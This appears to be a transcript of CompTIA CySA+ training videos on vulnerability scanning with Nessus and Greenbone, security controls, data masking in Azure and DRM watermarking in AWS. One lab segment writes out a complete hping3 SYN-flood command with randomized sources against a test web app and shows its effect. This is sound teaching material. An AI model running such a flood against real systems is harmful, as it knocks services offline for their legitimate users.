IP address, the MAC address. And we can also see in this case that the ssh and http port on this are open.
[Video description begins] He points to the following text: 192.168.0.6, 9E:DE:D0:B2:92:9B:. [Video
description ends]
It's running a Linux kernel. It says TP-LINK embedded httpd. So this could indicate, for example, that a user
has plugged in some kind of IoT device. Or it could even be a wireless router that has the ssh and http admin
ports open. So this can be a good indicator that things, perhaps, are on the network that shouldn't be.
During this video, you will learn how to run a Nessus scan.
Objectives
[Video description begins] Topic title: Nessus Vulnerability Scan. The presenter is Dan Lachance. [Video
description ends]
Nessus is another vulnerability scanning tool. Now, it's different from a standard network mapping tool like
Nmap, which identifies active hosts on a network and things like open ports. Certainly Nessus will do that as
well. But it can also detect very specific vulnerabilities based on missing patches or software configurations on
detected hosts. So you can go to the tenable.com site to download Nessus and acquire an activation code. I've
already done that and installed it locally. So I'm just going to go ahead sign in using my credentials.
[Video description begins] The following pop-up box is open: Welcome to Nessus Professional. It includes a
field labeled "Targets" and a button labeled "Submit". [Video description ends]
I'm currently running a trial edition. So I'm just going to click the x to remove that message in the upper right.
And at this point, we can specify a scan. So immediately, I can specify a scan target. I'm going to do that,
192.168.4.0/22. 22-bit subnet mask, that's the subnet that this host is connected to. So I'm going to go ahead
and Submit that scan.
[Video description begins] He types the following text in the "Targets" field: 192.168.4.0/22. [Video
description ends]
[Video description begins] The following pop-up box appears: My Host Discovery Scan Results. It includes a
button labeled "Run Scan". It also includes a table with two columns and several rows. The column headers
are "IP" and "DNS". [Video description ends]
After a moment, we can see it's begun to discover hosts on the given subnet range. So I'm going to go ahead
and, up in the column headers, turn on the check mark to select all the ones that were discovered thus far. And
I'm going to choose Run Scan.
[Video description begins] The Nessus Professional web page is open. It is divided into three parts. The first
part includes two options: Scans and Settings. The second part is a navigation pane. The third part is a
content pane. A page called "My Basic Network Scan" is open in the content pane. It includes three tabs:
Hosts, Vulnerabilities, and History. The "Hosts" tab is selected. It includes a table with three columns and
several rows. The column headers include "Host" and "Vulnerabilities". The page also includes a "Scan
Details" section and a "Vulnerabilities" section. [Video description ends]
After a while, we'll see for each discovered network host it's begun to determine how many vulnerabilities, if
any, that there are. And it's still in the midst of running as we can see here over on the right. Now blue is of no
concern according to the Vulnerabilities legend.
[Video description begins] He points to the "Scan Details" section. [Video description ends]
That's informational.
[Video description begins] He points to the "Vulnerabilities" section. It includes a pie chart. [Video
description ends]
And, if I kind of hover over it, we kind of know we have 87% of our vulnerabilities or messages are just
informational. We can see the number per host. But what concerns me is that we've got some vulnerabilities
here showing up as being Medium, according to the legend, for the hosts. Now, I'm going to click on that for a
particular host to jump into it.
[Video description begins] He clicks the first row entry in the "Vulnerabilities" column and its corresponding
page opens. It includes a table with four columns and several rows. The column headers include "Name" and
"Count". [Video description ends]
Looks like right away we've got SSL issues related to that particular host. So I'm going to click to open that up.
What are those issues?
[Video description begins] He clicks the first row entry in the "Name" column and its corresponding page
opens. It includes a table with four columns and several rows. The column headers include "Sev", "Name",
and "Count". [Video description ends]
[Video description begins] He points to the row entries in the "Sev" column. [Video description ends]
[Video description begins] He clicks the first row entry in the "Name" column and its corresponding page
opens. [Video description ends]
So, if we click on that, that usually means it's a self-certified certificate. Okay, well, that's okay.
[Video description begins] He navigates back to the previous page. [Video description ends]
Depending on what our environment is, we might have configured a trusted root key on all devices so that it
would be trusted. The other thing we can do here, I'll just go back to My Scans and My Basic Network Scan,
just to get back here.
[Video description begins] He navigates back to the "My Basic Network Scan" page. [Video description ends]
We can also actually click directly on the host to get a list of everything about that host. So, for example, I can
see it's running the Linux kernel.
[Video description begins] He clicks the first row entry in the "Host" column and its corresponding page
opens. It includes a "Host Details" section and a table with four columns and several rows. The column
headers include "Name" and "Family". [Video description ends]
And also I can see any type of items that it's discovered. So it's discovered some items running on that. So it's
discovered that there are SSL and TLS versions that are supported. It knows that the Nessus scanner is
installed on it. So that would be the host we're sitting at right here that was discovered on the network. So we
can see some of that also shown here.
[Video description begins] He points at the row entries in the "Name" column header. [Video description
ends]
Now, when we go back to our scans, let's say I go back to My Basic Network Scan.
[Video description begins] He navigates back to the "My Basic Network Scan" page. [Video description ends]
You can also just view all of the vulnerabilities at the top by clicking the Vulnerabilities tab.
[Video description begins] He selects the "Vulnerabilities" tab. It includes a table with four columns and
several rows. The column headers include "Name", "Family", and "Count". [Video description ends]
[Video description begins] He clicks the second row entry in the "Name" column and its corresponding page
opens. It includes a table with four columns and several rows. The column headers include "Name", "Family",
and "Count". [Video description ends]
So, for example, I've got multiple DNS issues, 12 instances under Count, and if we click on it, we can also see
that, okay, looks like we've got them broken up now into the count per DNS issue.
[Video description begins] He points to the row entries in the "Count" column. He clicks the third row entry in
the "Name" column and its corresponding page opens. [Video description ends]
I'm interested not necessarily in just these informational items, but more so in things that are problematic, like
medium level threats.
[Video description begins] He navigates back to the previous page. He then clicks the first row entry in the
"Name" column and its corresponding page opens. It includes a section called "Output" under which there is a
table with two columns and one row. The column headers are "Port" and "Hosts". [Video description ends]
So, DNS Server Cache Snooping, that's not good. I'm going to click on that. And we can read a little bit about
what that means. But more importantly, at the very bottom, we can see the port number. So udp port 53, it's a
DNS server, accepting DNS client queries. And we can see the IP addresses of the discovered hosts where
that's an issue. So we can start to remediate or solve that problem because we know the identity of the hosts
where that problem exists. Now, the thing to remember about vulnerability scanning is that it's getting very in
depth on a machine. And it will be checking specific software on the machine and versions and known
vulnerabilities. And to be up-to-date with that, it needs to have some software updates applied.
[Video description begins] He clicks the "Settings" option in the first part of the screen. The SETTINGS pane
opens in the second part. It includes an "About" option. The About option is selected and its corresponding
page is open in the content pane. It includes several tabs including "Overview" and "Software Update". He
selects the "Software Update" tab. It includes three radio buttons labeled "Update all components", "Update
plugins", and "Disabled". It also includes a drop-down list box labeled "Update Frequency" and a button
labeled "Save". The "Update all components" radio button is selected. The "Daily" option is selected in the
"Update Frequency" drop-down list box. [Video description ends]
So if I go to Settings, Software Updates, Update all components is set to occur here daily.
[Video description begins] He navigates to the "My Scans" page. It includes a button labeled "New
Scan". [Video description ends]
Back here to Scans, if we click the New Scan button, we get to select from a number of different templates.
[Video description begins] A page called "Scan Templates" opens. It includes a card labeled "WannaCry
Ransomware". [Video description ends]
For example, if I want to scan for WannaCry Ransomware instances, then I could select that and fill out the
details.
[Video description begins] The "WannaCry Ransomware" page opens. It includes three tabs: Settings,
Credentials, and Plugins. The "Settings" tab is selected. [Video description ends]
But notice that we can also specify whether we want to have a credentialed versus a non-credentialed scan.
[Video description begins] He selects the "Credentials" tab. [Video description ends]
Depends on what your intent is. If we want to be able to reach out across the network, maybe using a standard
admin set of creds that work on all devices. Then we could specify that here. And there is no question that this
scan will be much more thorough. If that's the intent. If the intent is to see what vulnerabilities could be
detected by malicious users that don't have that information. Then you might go with a non-credentialed scan.
This video will show you how to view the results of a vulnerability scan.
Objectives
[Video description begins] Topic title: Greenbone Security Manager Vulnerability Scan. The presenter is Dan
Lachance. [Video description ends]
Greenbone Security Manager, or GSM, is another example of a great vulnerability scanning tool. Now, you
can purchase this and run it on premises such as in a virtual machine. In this case, I'm going to run a live demo
online. So I've gone to the livedemo.greenbone.net URL, where I'm going to sign in with a Username of
livedemo and a Password of livedemo. So we're going to be looking at sample scan information. But it's a great
way to kind of evaluate the product to see what kind of insights can be gained by viewing scan results.
[Video description begins] The Greenbone Security Manager web page includes a "Dashboards" menu, a
"Scans" menu, and an "Assets" menu. [Video description ends]
The first thing I'm going to do is go to the Scans menu and choose Reports. So here we can see that we've got a
report that was generated on a specific date and time.
[Video description begins] The Reports page opens. [Video description ends]
And we get all of these tabs across the top, so I can look at the Results.
[Video description begins] He selects the "Results" tab. It includes a table with several columns and several
rows. The column headers include "Vulnerability", "Severity", and "Location". [Video description ends]
For example, I can sort by any of these things like Severity. Currently, reviewing severities from highest to
lowest. We could also sort otherwise, if we so chose. But I want to view from highest to lowest. We've got
some high severity items and we see a couple of them listed here. They're repeated because they occur, there
are multiple instances on different hosts. So, if I click to open any of those up, it just gives me a little bit of
details about how that was detected.
[Video description begins] The "Hosts" tab includes a table with several columns and several rows. The
column headers include "IP Address", "OS", "Ports", and "Severity". [Video description ends]
If we go to the Hosts tab we can see all the hosts that were discovered at that point when that scan or that
analysis was being conducted. All the way down to viewing different Linux variants such as Ubuntu Linux,
and Debian Linux Variance.
[Video description begins] He points to the row entries in the "OS" column. [Video description ends]
We can also see of course, the severity rating over on the far right. This is always what we want to watch out
for. As you might guess, it's not great to have this many occurrences of high severities in the scan.
[Video description begins] He points to the row entries in the "Severity" column. [Video description ends]
We can go to Ports and see the number of host with a particular port number.
[Video description begins] He selects the "Ports" tab. It includes a table with three columns and several rows.
The column headers are "Port", "Hosts", and "Severity". [Video description ends]
Such as port 22 for SSH or port 3389 for RDP, for remote management of Windows hosts.
[Video description begins] He points to the row entries in the "Port" column. [Video description ends]
We can go to Applications to see what was discovered. Operating Systems, CVEs, where CVE stands for
common vulnerabilities and exposures. These are standard out on the Internet.
[Video description begins] He selects the "CVEs" tab. It includes a table with four columns and several rows.
The column headers are "CVE", "Hosts", "Occurrences", and "Severity". [Video description ends]
So, and they're links, so we can click on any one of them to read about that since it did show up as a result of
our scan. So there's a Description about what the vulnerability is. And down below there are some references
and advisories. And Vulnerable Products like Windows 7 and Windows Server 2008 r2, SP1 Itanium, and x64.
So it's telling us a lot of information right from the get go. If I go under the Scans menu, I can also choose
Results.
[Video description begins] The "Results" page opens. It includes a graph labeled "Results by CVSS". He
points to the graph. [Video description ends]
So for example, over here on the right, we can see that we've got quite a few medium severities, specifically
little over a 100. So somewhere between a 100 and 110 based on the scans. And we can scroll down below and
see what those items actually are.
[Video description begins] The "Results" page also includes a table with several columns and several rows.
The column headers include "Vulnerability", "Severity", and "Location". [Video description ends]
Now, these severities currently are listed as low. I'm going to click on Severity and then sort it so we see the
highest ones. This is more relevant, SMB 1 is enabled. Again, we can see the detection method and so on, so
that shows up here again. So we're seeing a lot of the same information, but in a little bit of a different way.
And in the bottom right, you also have an Export button where you can export as an XML file. So that's a
possibility as well. If I go to the Assets menu, I can see any hosts that have been detected overall.
[Video description begins] He clicks the "Assets" menu and selects the "Hosts" option from the menu and its
corresponding page opens. It includes a table with several columns and several rows. The column headers
include "Name", "IP Address", "OS", and "Severity". [Video description ends]
I can see scrolling down this list, all the hosts, the OS type, the severity levels. So this is a great way to have an
inventory of what's out there. Now this may change from one scan to the next. However, because one might
detect new items is what might happen. But we also have the option of exporting this page contents, sort of as
an inventory listing. If I go to the Assets menu, I can also view it by operating system. And here we can see the
vulnerabilities per operating systems. By far the problem in our specific environment is with vulnerabilities
associated with the Windows platform.
In this video, you will use the hping tool to generate network traffic that will cause a SYN flood.
Objectives
[Video description begins] Topic title: Hping Packet Generation. The presenter is Dan Lachance. [Video
description ends]
One type of denial-of-service attack against a web application is a SYN flood. This means that you're
essentially sending a lot of half-open TCP connections to a web server but never actually finishing the three-
way handshake. And eventually it exhausts the server's resource, thus limiting the legitimate connections that
the server will allow. So here at 192.168.4.54, I've got a sample application.
[Video description begins] The BADSTORE.NET web page is open in a browser. [Video description ends]
It's just a sample application that's used to test web application vulnerabilities, and it'll serve our purpose here.
Here in Kali Linux, I'm going to use the hping3 command to execute this denial-of-service attack.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: root@kali:~#. [Video description ends]
So I'm going to use -c and let's say I specify 10000. c means count, how many packets do we want to send.
And I want the size of each of them to be 120 bytes. So -d 120 -S, I want to send SYN packets. And then I'm
going to specify the TCP window size with the -w of 64. I'm going to specify -p, specify a target port of 80.
And I'm going to use --flood. And I'm also going to use --rand-source to generate random source IP addresses.
Then, I'll add a space and I'll specify the target. In this case it's 192.168.4.54, that web page we were looking
at. Just before I press Enter, I'm going to start a Wireshark packet capturing session. And I'm going to go ahead
and run this command.
[Video description begins] He executes the following command: hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood
--rand-source 192.168.4.54. The output displays that no replies will be shown as hping is in flood
mode. [Video description ends]
So let's flip over and take a look at what's happening in Wireshark for a moment. So I've got a live capture here
in Wireshark. I'm going to filter it.
[Video description begins] He switches to a window called "Capturing from Wi-Fi". It includes a search bar
and a table with several columns and several rows. The column headers includes Time, Source, and
Destination. [Video description ends]
So I'm going to use IP address equals 192.168.4.54. And we can see we have a lot of traffic for 54 but look at
all these differing IP addresses. That's because we told the hping3 command that we want to generate a lot of
random IP addresses trying to make connections to our web site running on 192.168.4.54.
[Video description begins] He types the following text in the search bar: ip.addr==192.168.4.54. The results
in the table get filtered by IP address 192.168.4.54 in the "Source" column. [Video description ends]
Let's see if that site is still responding back in the web browser.
[Video description begins] He switches back to the BADSTORE.NET web page in the browser. [Video
description ends]
So back here in the web browser, I've refreshed the web page, but notice it's still trying to load the page. It can't
get a valid connection to it because it's so busy being flooded from the result of our hping3 command. So the
real way to mitigate this would be to use a firewall solution, for example, that supports SYN flood protection.
Or to use techniques like blackholing where you take traffic that is coming to this host from those locations
and basically route it to nowhere. However, that becomes difficult because how do you distinguish the
difference between legitimate traffic and suspicious traffic.
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined scanning and testing techniques used for identifying security weaknesses in
networks, hosts, and apps. We did this by exploring how vulnerability scanning can identify security
weaknesses. We looked at how penetration testing can identify and exploit security weaknesses. We also
discussed the Metasploit Framework, which is used as a penetration testing tool. We talked about Nmap
network scans. And also how to identify changes using network scan comparisons. We looked at how to run a
Nessus and an OpenVAS vulnerability scan. We also looked at how to use the hping tool to generate network
SYN flood traffic. In our next course, we'll move on to explore how an organization can mitigate security
threats against data at rest and data in transit. Using techniques such as patching, data masking, secure data
disposal, and IPsec.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, I'm Dan Lachance. [Video description begins] Your host for this session is Dan Lachance. He is an IT
trainer/consultant. [Video description ends]
I've worked in various IT roles since the early 1990s, including as a technical trainer, as a programmer, a
consultant, as well as an IT tech author and editor. I've held and still hold IT certifications related to Linux,
Novell, Lotus, CompTIA, and Microsoft. Some of my specialities over the years have included networking, IT
security, cloud solutions, Linux management and configuration, and troubleshooting across a wide array of
Microsoft products.
The CS0-002 CompTIA Cybersecurity Analyst, or CYSA+, certification exam is designed for IT professionals
looking to gain security analysts' skills to perform data analysis; to identify vulnerabilities, threats, and risks to
an organization; to configure and use threat detection tools; and secure and protect an organization's
applications and systems.
In this course, we're going to explore data security risk mitigation using techniques such as patching, data
masking, digital rights management, secure data disposal, and IPsec. I'll start by examining IT security threat
remediation challenges, talk about the importance of hardware and software patching, the various security
controls categories, and the components of organizational security policies. I'll then demonstrate how to enable
data masking in Microsoft Azure, talk about watermarks in AWS with Elastic Transcoder, and also show you
how to work with baselines.
Next I'll examine various types of IT security training exercises and how automation can simplify and expedite
security tasks. I'll then demonstrate how to securely delete a disk partition using a multipass disk-wiping tool
and how to enable Microsoft Group Policy password lockout settings. Lastly, I'll examine the use of IPsec for
securing IP traffic and I will show you how to enable IPsec and how to perform IPsec network traffic analysis.
Upon completion of this video, you will be able to list challenges related to IT security threat remediation.
Objectives
[Video description begins] Topic title: Remediation Challenges. Your host for this session is Dan
Lachance. [Video description ends]
In order to reduce the impact of negative security events, we have to identify any remediation challenges, the
first of which is identifying what you have, what crucial IT systems do we have and where are they? Are they
running on-premises, in the cloud, or both? What kind of data do they take as input? How do they process it
and what is the resultant output? So that means we also have to know what kind of data and the dataflows
between applications exist in our environment.
We then have to be able to classify that data. Without classifying data, how can you properly apply security
controls to data that is considered much more sensitive than other types of data? You wouldn't know that
unless you would classify the data. And there are many automated ways to discover and classify data both on-
premises and in the cloud.
Now after that's been done, we can then identify threats related to highly prized data. And then from there, we
can prioritize those threats and allocate resources accordingly. Naturally, we want to focus on those threats that
are of the highest priority. So the key here is to have a centralized mechanism in place to do this and to use
automation.
Now other remediation challenges include how to harden all of the devices on the network. Now devices
would include laptops; tablets; smartphones; specialty devices such as those in the medical industry; servers,
whether they're physical or virtual; routers; switches; storage arrays. The list goes on and on and on.
But in the enterprise environment, there needs to be a centralized way to inventory what devices exist, how
they're configured. We compare that against a security baseline, and we can automate and schedule hardening.
Hardening means not just applying patches but also removing unnecessary configurations, changing defaults.
And a periodic review of what we have and how it's configured is always important so that we can identify, for
example, new devices on the network that perhaps shouldn't be there.
Centralized automating of patches is crucial. So if we are a Windows environment, then we need to have some
kind of a centralized way to gather updates on a timely basis and apply them in a timely basis to devices
internally, whether that means using Microsoft System Center Configuration Manager or tools like WSUS,
Windows Server Update Services. And of course, for other platforms, it's equally as important to apply updates
as quickly as possible.
Then there's the consideration of older or legacy systems that might still be in use. They can present a
challenge when it comes to hardening or applying patches. For example, if we've got end-of-life hardware or
software products, there may no longer be updates that are supplied by the vendor. That is a security risk. We
might still be forced to use an older custom legacy system until a new one is built, such as a line-of-business
piece of software. So those can be tricky to secure.
One way to secure some of those items is to place them on an isolated network and allow only VPN access to
them where possible. We might have proprietary systems still in use. That kind of feeds back into legacy if it's
an older proprietary system that's out of date. Proprietary systems are a little more complex because they're not
standard off-the-shelf solutions. And so there usually needs to be a bit more effort in mitigating risks against
those proprietary systems.
The purpose of the memorandum of agreement or memorandum of understanding, whichever term you prefer,
is so that we have a clearly defined set of security expectations for all involved parties. And this might be
something that would be crucial in some cases for contracts to be awarded, such as between a government
agency and outside contractors where security is a big priority. So this is also related to security in the supply
chain.
For example, if there's a military contract and outside contractors are used, then the military would have to
think about the outside contractors as being part of the supply chain and a potential risk because it's something
that's outsourced. And so the memorandum of understanding can basically establish clear rules of engagement
when it comes to security.
One crucial aspect of hardening an IT environment is applying patches to both firmware and software. At the
firmware level, we're talking about user devices – things like smartphones, tablets, laptops, desktops. Then
there's printing devices; network infrastructure equipment like routers, switches, storage controllers; and an
entire array of IoT devices where some might support updating of the firmware. Some of course, do not, in
which case they should be isolated on their own network segment for security reasons.
Software patching would include applying updates to operating systems; software components such as
libraries, database drivers, hardware device drivers; and, of course, applying updates to apps running within the
operating system.
Now when we think about our strategy for hardening through patching of firmware and software, there are a
number of things that we have to be able to answer such as which devices do we have out on the network; how
many devices are there on the network; what are their specific makes, models, and what's the version number
of the existing firmware; how many devices are non-compliant with security patch baselines that we might
have configured; how many patch deployments that we have scheduled or manually invoked have succeeded
or failed.
So we need a way to inventory hardware and software to determine what versions they are running, what
patches are already applied. And then we need to have a security baseline that we then apply to send those
updates out. And then we have to have a way of knowing whether that worked or not. So there are a plenty of
centralized enterprise-class patching tools, example of which would include Windows Server Update Services,
or WSUS; Microsoft System Center Configuration Manager, SCCM; and on the mobile device side, using a
mobile device management, or MDM, tool. [Video description begins] Windows Server Update Services has
been abbreviated to WSUS. [Video description ends]
In this video, find out how to discuss the various categories of security controls.
Objectives
[Video description begins] Topic title: Security Controls. Your host for this session is Dan Lachance. [Video
description ends]
Security controls are all about reducing the impact of risk; so in other words, risk mitigation. Security controls
map to security requirements, otherwise called control objectives. And security controls can be put in place
manually or they can be triggered automatically.
There are different categories of controls such as preventative and detective. On the preventative security
control side, examples would include employee background checks; user training; data backups; configuring
firewall access control lists, or ACLs; job rotation – moving employees into different job roles
periodically. [Video description begins] The slide indicates that preventive is one of the categories of security
controls. [Video description ends] Not only does that expand the knowledge base and experience of
employees, but it also allows someone currently fulfilling a role to perhaps notice any previous anomalies.
Putting locks on doors is a preventative measure at the physical security level; and the use of security guards.
All of these are designed to prevent security incidents from occurring. Detective security controls include the
periodic review of log files to detect any indicators of compromise; the use of intrusion detection systems, or
IDSs; alarm systems. Job rotation also falls into detective as well as preventive. So do security guards. So there
is a bit of overlap between these items.
So we've got some things here like employee background checks, which are administrative controls, and then
we've got some more technical-based controls such as intrusion detection systems. But there are other
categories such as corrective and recovery and deterrent controls. An example of a corrective or recovery type
of control would be to restore a system or data to a functional state, so data restoration, reimaging a failed
server, patching a vulnerable host.
A deterrent security control might come in the form of perimeter fencing around a property; having lighting,
for example, in a parking lot or around building entrances; signage warning of camera surveillance; video
surveillance cameras actually being used. Security guards can also be considered a deterrent security control.
So here we have some examples of physical controls like perimeter fencing and lighting as an example.
Then we've got compensating controls. A compensating security control is an alternative or a second choice to
a primary control. But why won't you just use your first choice, the primary control, that addresses threat
mitigation? Well, one of the reasons is because it might be cost prohibitive – too expensive.
It might be too complex to implement within a reasonable time frame. So examples of this might include
segregation of duties. Now this means that we don't have a single employee handling an entire business
process from beginning to end, especially when money is involved. It could also include network isolation for
legacy devices that might not support password complexity requirements. So these compensate by applying
some other alternative that reduces the impact of the threat.
So control objectives and controls are commonly stated in security documentation. An example of a control
objective might be that we have no more than two hours of data that are lost. So the control to address that
might be to back up data every 1.5 hours. As another example, control objective might be to ensure that users
have an awareness of the latest social engineering threats. And a control might be monthly or quarterly lunch
and learn sessions.
Now this would be important because without user awareness of social engineering threats, it could lead to
users clicking on things that would infect their computer. And that malware might reach out to the Internet, to
command-and-control servers. That means those things could be mitigated with things like DNS sinkholing,
essentially returning false DNS query results to malware, so it can't talk to command-and-control servers. But
nonetheless, there are things that we can do ahead of time to try to reduce that from happening.
The next control objective – financial spreadsheet user accountability. So the control to address that could be
the use of separate user accounts when accessing those spreadsheets and then auditing file system access to
those files. A control objective might come in the form of encryption of personally identifiable information, or
PII. So the control to do that would be to force PII storage on Windows BitLocker disk volumes in a Windows
environment.
If the control objective states that high importance e-mail messages must be proven to be authentic, then the
control would be to use e-mail digital signatures. If the control objective is to ensure that accurate migration of
data between systems occurs, the control to deal with that might be to use a standardized format such as XML.
Another example of a security control is data tokenization. In our example in the upper left, we've got a user
with a credit card number and an expiry date and also the CVC unique code on the card. So by passing that
information into a trusted tokenization service, we end up with a unique token. So it maps sensitive data to the
token. So we see the token on the right results in a unique value – in this case, 4732916.
So what can happen then is for financial transactions that might require credit card payment, as long as those
merchants trust the tokenization service, then the token can be used as an acceptable form of credit card
payments. So it's a way to protect the original sensitive information, so it doesn't get passed around to all kinds
of different websites, for example, that require credit card payments.
The other thing to think about is that data tokenization is considered secure because it's irreversible. There's
always a unique token, such as per retailer. The sensitive original data, in our case, the credit card number and
the expiry date, that kind of thing is never sent over the network; only the token is. The sensitive data itself
isn't stored on end user devices like a smartphone. However, the token is stored on the user device.
But again, because the token is irreversible, that does not present a security risk. So there are plenty of
different types of security controls at many different levels that can be applied to secure data. [Video
description begins] The following information is displayed on screen: Digital tokens are stored on user
devices. [Video description ends]
Upon completion of this video, you will be able to recognize the components of organizational security
policies.
Objectives
[Video description begins] Topic title: Organizational Security Policies. Your host for this session is Dan
Lachance. [Video description ends]
Organizations and government agencies have a series of security policies that are designed to protect assets as
long as those policies are adhered to and enforced. This would protect business processes, data assets such as
the encryption of personally identifiable information. And this might be required to remain compliant with
applicable laws and regulations. And it can also be related to incident response plans by having organizational
security policies in place to protect assets, make sure that the incident response will be effective when a
security incident does occur.
So risk management is a part of organizational security policies as well. Risk management begins with
identifying assets and periodically reviewing assets and their threats because that can change over time, just
like a security control can. A security control that might have been adequate in protecting an asset at one point
in time may no longer be considered adequate in protecting that asset at the next periodic review. And so either
the entire control might need to be replaced or it might need to be reconfigured.
Either way, that can have an impact on organizational security policies whereby, for example, if we have to
replace a VPN solution with something completely different, that might also affect the VPN acceptable use
policy. So it can have an impact on policies, speaking of which, there are many different types of
organizational security policies. [Video description begins] The following information is displayed on screen:
Update organizational security policies. [Video description ends]
There are those that deal with ethics and code of conduct. There are acceptable use policies, or AUPs, of which
there are many types. There might be an acceptable use policy for e-mail, for web browsing, or data
encryption. There might be an acceptable use policy for the VPN. Often, this is part of the user-onboarding
process when people are hired, that they would sign off on these acceptable use policies. There are password-
based policies, data ownership and retention policies often influenced by regulatory compliance, and also
account management policies. There are many others beyond just these, but this is but a small sampling to
think about.
COBIT stands for Control Objectives for Information and Related Technology. Now a control objective is a
security requirement, an assertion that something must be secured. The control put in place deals with how that
objective is dealt with. So this is really an IT governance framework for businesses. So we said the control
objective is basically an assertion about security control requirements and the control is the implemented
solution to mitigate those threats.
Dynamic data masking is a security mechanism that you can apply, for example, when users are pulling up
sensitive information on their screens. A good example of this would be things like credit card numbers where
you might want to mask the entire thing other than the last four digits, or maybe masking parts of an e-mail
address or anything else that might be considered sensitive. And usually this means we're doing this in
alignment with regulatory compliance.
So let's take a look at how we might apply dynamic data masking to a SQL database running in the Microsoft
Azure cloud. [Video description begins] The home page of Microsoft Azure is open. It includes a "Recent
resources" section, which contains a table with the following columns: Name, Type, and Last Viewed. A few
resources, including a db173 (srv172/db173) link with Type listed as SQL database, appear in the
table. [Video description ends] I've already got a Microsoft Azure account.
And I've already deployed a Microsoft SQL database. And the database is using some sample data. So I'm
going to go ahead here and click on my database, db173, to pull up its properties. [Video description begins] A
db173 (srv172/db173) page opens. It has the following categories in the navigation pane: Overview, Power
Platform, Security, etc. The Security category, which is expanded, includes a "Dynamic Data Masking"
subcategory. [Video description ends]
So on the left-hand navigator, what I need to do is scroll down under the Security section where I can see
Dynamic Data Masking.
[Video description begins] With the presenter selecting the "Dynamic Data Masking" subcategory, the
corresponding view includes a "Save" button and a "Masking rules" table with the following columns: Mask
name and Mask Function. The table displays the message: You haven't created any masking rules. The
subcategory also includes a "Recommended fields to mask" table with the following columns: Schema, Table,
and Column. Several schemata, each featuring an associated "Add mask" button, appear in the table. These
include a few SalesLT schemata with Table listed as Customer. [Video description ends]
Now it automatically has recommendations for which fields I may want to mask. So it's picking up that I have
a Customer table and it's also picking up all of the different columns. So for example, maybe I want to add a
mask for the EmailAddress field and anything else that I might deem as being sensitive information. [Video
description begins] He clicks the "Add mask" button associated with a record having Schema listed as
SalesLT, Table listed as Customer, and Column listed as EmailAddress. [Video description ends]
So I'm going to scroll back up. Now we can see that the customer e-mail address field has been added up here
because we clicked add the mask down below. [Video description begins] A SalesLT_Customer_EmailAddress
mask name with Mask Function listed as Default value (0, xxxx, 01-01-1900) appears in the "Masking rules"
table. [Video description ends]
And if I click on the e-mail address up here in the Masking rules section, I can determine how I want it
masked. [Video description begins] An "Edit Mask Rule" pane appears. It includes a "Masking field format"
drop-down list. He expands the list to reveal a few options, including Credit card value (xxxx-xxxx-xxxx-1234)
and Email ([email protected]). [Video description ends]
Notice, there are some presets for credit card number masking. That doesn't apply here. E-mail address
masking does. I'm going to go ahead and select that and click Update. And then when I click the X to close that
little screen, we can now see that the masking function reflects my latest selection. So at this point, we would
click the Save button to put that into effect. Now bear in mind that when you're using Microsoft SQL Database
dynamic data masking, any SQL user that has administrative-level privileges will be excluded from the mask.
So in other words, they would see everything.
In this video, find out how to enable watermarks in Amazon Web Services with Elastic Transcoder.
Objectives
[Video description begins] Topic title: Cloud Digital Rights Management. Your host for this session is Dan
Lachance. [Video description ends]
Intellectual property, or IP, is essentially any creative work that can be protected, for example, by a traditional
copyright. It might be a piece of music. It could be a specific and unique industrial process. Whatever it is, in
the digital world, it can be protected using digital rights management, or DRM. The simplest implementation
of this is probably to embed a watermark in digital media, which we're going to do in this example. The
watermark allows us to help prevent piracy of media.
[Video description begins] The AWS Management Console tab and the S3 Management Console tab display.
The S3 Management Console tab is selected and displays a bucketyyz page. The page contains the following
tabs: Overview, Properties, Permissions, etc. The "Overview" tab, which is selected, includes a table with the
following columns: Name, Last modified, Size, etc. A "Vids" link and a "logo.jpg" link are listed in the
table. [Video description ends]
So we get started here in Amazon Web Services in the S3 Management Console where I've opened up a
bucket, a storage bucket, in the cloud called bucketyyz. In it, I've got a logo file. If I click and open up that
logo file, it's just a fake logo. But I want to embed this as the watermark on a video. [Video description
begins] When the presenter clicks the "logo.jpg" link, a "logo.jpg" page opens. It contains the following tabs:
Overview, Properties, Permissions, etc. The Overview tab, which is selected, includes an "Open" button. And
when he clicks the button, the file opens in a new tab. [Video description ends]
Now if we go back into the bucket, I've also got a folder called Vids with a video called Demo_Video. And it's
a WMV file. [Video description begins] When he clicks the "Vids" link, the corresponding page that opens
includes a table with the following columns: Name, Last modified, Size, etc. A Demo_Video.wmv link is listed
in the table. [Video description ends] So what we're going to do and I'm just going to switch over here to the
AWS Management Console, the main screen. [Video description begins] The home page includes a "Find
Services" Search box. [Video description ends]
I'm going to search for transcoder because the Elastic Transcoder service is designed for rendering media from
one type to another while doing things such as embedding watermarks. [Video description begins] When he
types "transcoder" in the "Find Services" Search box, the following result displays: Elastic Transcoder. And
when he selects it, the corresponding page that opens has the following categories in the navigation pane:
Pipelines, Jobs, and Presets. Currently, Pipelines is selected. It includes two buttons: Create New Pipeline
and Create New Job. [Video description ends]
I'm going to create a pipeline. A pipeline is essentially the conduit into which we feed rendering jobs. I'm
going to call this pipeline2. [Video description begins] When he clicks the "Create New Pipeline" button, the
corresponding page that opens includes a "Pipeline Name" field, an "Input Bucket" field, and the following
sections: Configuration for Amazon S3 Bucket for Transcoded Files and Playlists and Configuration for
Amazon S3 Bucket for Thumbnails. Each of the two sections includes a "Bucket" field and a "Storage Class"
drop-down list. He types "pipeline2" in the "Pipeline Name" field. [Video description ends]
And the input bucket here where we're going to retrieve items that will be rendered is going to be
bucketyyz. [Video description begins] He clicks in the "Input Bucket" field and a list opens. It includes the
bucketyyz option, which he selects. [Video description ends] And if I scroll down below, the output bucket, it's
going to be the same. It doesn't have to be but it can be. And for the Storage Class, I'll just choose
Standard. [Video description begins] He similarly selects the bucketyyz option in the "Bucket" field that
displays in the "Configuration for Amazon S3 Bucket for Transcoded Files and Playlists" section. [Video
description ends]
I don't need to reduce the redundancy, the number of copies that are stored. [Video description begins] He
expands the "Storage Class" drop-down list to reveal the following options: Standard and Reduced
Redundancy. He selects the first option. [Video description ends] And same for thumbnails. If we generate
thumbnails, then we can also specify the storage location and the storage class. [Video description begins] In
the "Configuration for Amazon S3 Bucket for Thumbnails" section, he selects the bucketyyz option in the
"Bucket" field and the Standard option from the "Storage Class" drop-down list. [Video description ends]
